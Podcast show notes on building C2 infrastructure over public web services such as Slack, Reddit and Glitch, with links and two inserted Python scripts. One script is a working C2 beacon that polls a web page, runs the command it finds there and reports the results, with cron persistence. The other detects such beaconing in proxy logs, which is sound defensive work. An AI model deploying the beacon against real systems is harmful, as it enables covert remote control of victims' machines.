Sunday, March 17, 2019

2019-011-Zach_Ruble-building_a_better_cheaper_C2_infra


Shout-out to Thomas…

    Tried to meet up while at SEA Comic-Con

Patreon

Log-MD

Hacker’s Health - Ms. Roddie is at TROOPERS (Ms. Berlin?)

4 podcasts?

SpecterOps Training / workshopCon  - https://www.workshopcon.com/events

Zach Ruble- @sendrublez

C2 infra using Public WebApps

TARCE - Teaching Assistant RCE(?) - they run your code every week and don't check it for backdoors before running it...

C2 Basics

    Local HTTPd server (bashfile)

    Python scrapes web server

3 components

-Servers

-Communication channels

-Malware and client


3 Requirements of a C2

-Victim receives commands

-Victim executes them

-Victim sends results back

Web server serving a static file

Malware on the victim scrapes the site with Python requests and executes the fetched text as commands.

Persistence: crontab @reboot


State change = change the text field
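The loop the notes sketch (static file on a web server, a Python scraper on the victim, crontab @reboot for persistence, act only on a state change of the text field), as an added example that is not the guest's code. It uses the standard library (urllib instead of requests) so it runs without dependencies; the 'cmd:' marker, the report sink and the constructed page text are assumptions:

```python
"""Static-file C2 beacon covering the three requirements above: receive a
command, execute it, send results back. Added example, not the guest's code.
The page layout (a line starting with 'cmd:') and the report sink are assumed."""
import hashlib
import shlex
import subprocess
import urllib.request
from typing import Callable, Dict, Optional

MARKER = "cmd:"  # assumed convention: the operator writes the command after this marker


def fetch_url(url: str, timeout: int = 10) -> str:
    """Pull the static page over HTTP(S); the offline demo below injects a stub instead."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_command(page: str, marker: str = MARKER) -> Optional[str]:
    """Return the first command embedded in the page text, or None if there is none."""
    for line in page.splitlines():
        line = line.strip()
        if line.startswith(marker):
            cmd = line[len(marker):].strip()
            if cmd:
                return cmd
    return None


def run_command(cmd: str, timeout: int = 30) -> Dict[str, object]:
    """Execute the operator's command (no shell; the page text is split into argv)."""
    proc = subprocess.run(shlex.split(cmd), capture_output=True, text=True, timeout=timeout)
    return {"cmd": cmd, "rc": proc.returncode, "stdout": proc.stdout, "stderr": proc.stderr}


def poll_once(fetch: Callable[[], str],
              report: Callable[[Dict[str, object]], None],
              state: Dict[str, str]) -> Optional[Dict[str, object]]:
    """One beacon cycle. Only a state change in the text field triggers execution:
    a command already seen is ignored, so the victim does not re-run it every poll."""
    cmd = extract_command(fetch())
    if cmd is None:
        return None
    digest = hashlib.sha256(cmd.encode()).hexdigest()
    if state.get("last") == digest:
        return None  # text field unchanged since the last poll
    state["last"] = digest
    result = run_command(cmd)
    report(result)  # third requirement: send results back (sink is an assumption)
    return result


if __name__ == "__main__":
    # Constructed stand-in for the hosted static file. A real beacon would call
    # fetch_url("https://...") here and be scheduled with an `@reboot` crontab entry.
    page = "<html><body>\nstatus: green\ncmd: echo hello\n</body></html>"
    sent = []
    state: Dict[str, str] = {}
    poll_once(lambda: page, sent.append, state)  # runs the command once
    poll_once(lambda: page, sent.append, state)  # no state change: skipped
    print(sent)
```

The digest of the last command is the whole client-side state; changing the text field on the server is the only thing the operator has to do, which is why a static page, an Instagram comment or a Slack message all work as the channel.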

https://www.bleepingcomputer.com/news/security/russian-state-hackers-use-britney-spears-instagram-posts-to-control-malware/

https://uwbacm.com/


Long haul/short haul server

Long haul - regain persistence

Short haul - sends commands to victims


Slack as C2 - blends into the environment

    Send and receive messages

    Using Real Time Messaging API

https://3xpl01tc0d3r.blogspot.com/2018/06/how-to-use-slack-as-c2-sever.html

https://link.springer.com/chapter/10.1007/978-3-319-27137-8_24

https://glitch.com/

https://github.com/bkup/SlackShell


Reddit as a C2

    “Reddit Rising”


Glitch.com

    Serverless platform


Using Google search results as

    Would Google's algorithms notice the odd behavior of hundreds of hosts searching for the same thing?

Log file analysis?

    How can we protect against this?
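One answer to the log-analysis question above, as an added example that is not from the episode: a beacon detector run over web-proxy log lines. When the channel is a legitimate site (Slack, Reddit, Google, a CDN), destination reputation tells you nothing, so the detector looks at behavior instead: near-constant polling intervals per host, and the same URL polled regularly by several hosts. The log format is a constructed simplification and the thresholds are assumptions to tune per environment:

```python
"""Beacon detection over proxy logs. Added example, not from the episode. The log
format (epoch_seconds src_ip method url status) is a constructed simplification of
a proxy access log; the thresholds are assumptions to tune per environment."""
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Tuple

Key = Tuple[str, str]  # (source host, URL)

# Constructed sample: two hosts polling one static file every ~60 s, one host
# browsing normally, one host hitting the same file at irregular times.
SAMPLE_LOG = """\
1552809600 10.0.0.5 GET http://cdn.example.net/status.txt 200
1552809660 10.0.0.5 GET http://cdn.example.net/status.txt 200
1552809720 10.0.0.5 GET http://cdn.example.net/status.txt 200
1552809780 10.0.0.5 GET http://cdn.example.net/status.txt 200
1552809840 10.0.0.5 GET http://cdn.example.net/status.txt 200
1552809600 10.0.0.9 GET http://cdn.example.net/status.txt 200
1552809661 10.0.0.9 GET http://cdn.example.net/status.txt 200
1552809719 10.0.0.9 GET http://cdn.example.net/status.txt 200
1552809781 10.0.0.9 GET http://cdn.example.net/status.txt 200
1552809839 10.0.0.9 GET http://cdn.example.net/status.txt 200
1552809605 10.0.0.7 GET http://news.example.com/ 200
1552809900 10.0.0.7 GET http://news.example.com/sports 200
1552810400 10.0.0.7 GET http://news.example.com/weather 200
1552810420 10.0.0.7 GET http://news.example.com/ 200
1552809600 10.0.0.11 GET http://cdn.example.net/status.txt 200
1552809640 10.0.0.11 GET http://cdn.example.net/status.txt 200
1552810300 10.0.0.11 GET http://cdn.example.net/status.txt 200
1552810320 10.0.0.11 GET http://cdn.example.net/status.txt 200
"""


def parse_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (timestamp, src, url) tuples, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        try:
            records.append((int(parts[0]), parts[1], parts[3]))
        except ValueError:
            continue
    return records


def beacon_candidates(records, min_hits: int = 4, max_cv: float = 0.15) -> Dict[Key, Tuple[int, float]]:
    """Flag (host, url) pairs fetched at near-constant intervals.
    Regularity is the coefficient of variation of the gaps between requests
    (stdev / mean): a cron or sleep loop scores near 0, ordinary browsing scores
    high. Returns {key: (mean_interval_seconds, cv)}."""
    by_key: Dict[Key, List[int]] = defaultdict(list)
    for ts, src, url in records:
        by_key[(src, url)].append(ts)
    flagged: Dict[Key, Tuple[int, float]] = {}
    for key, times in by_key.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mu = mean(gaps)
        if mu <= 0:
            continue
        cv = pstdev(gaps) / mu
        if cv <= max_cv:
            flagged[key] = (round(mu), round(cv, 3))
    return flagged


def shared_beacons(flagged: Dict[Key, Tuple[int, float]], min_hosts: int = 2) -> Dict[str, List[str]]:
    """URLs that several hosts poll regularly: the 'many hosts fetching the same
    thing' signal the notes ask about, which a single-host view would miss."""
    hosts: Dict[str, set] = defaultdict(set)
    for src, url in flagged:
        hosts[url].add(src)
    return {url: sorted(h) for url, h in hosts.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    flagged = beacon_candidates(parse_log(SAMPLE_LOG))
    for (src, url), (interval, cv) in sorted(flagged.items()):
        print(f"{src} polls {url} every ~{interval}s (cv={cv})")
    print("shared:", shared_beacons(flagged))
```

Caveat: an operator who adds random jitter to the sleep pushes the coefficient of variation up, so the per-host test alone is easy to evade; the cross-host view (shared_beacons) is harder to beat because every implant still has to fetch the same text field. In practice both signals get combined with how rare the destination is for that user's normal baseline.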

C2 News (If we go short) :

https://www.zdnet.com/article/outlaws-shellbot-infects-servers-for-monero-mining

Automating OSINT

https://twitter.com/jms_dot_py

http://www.automatingosint.com/blog/


Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

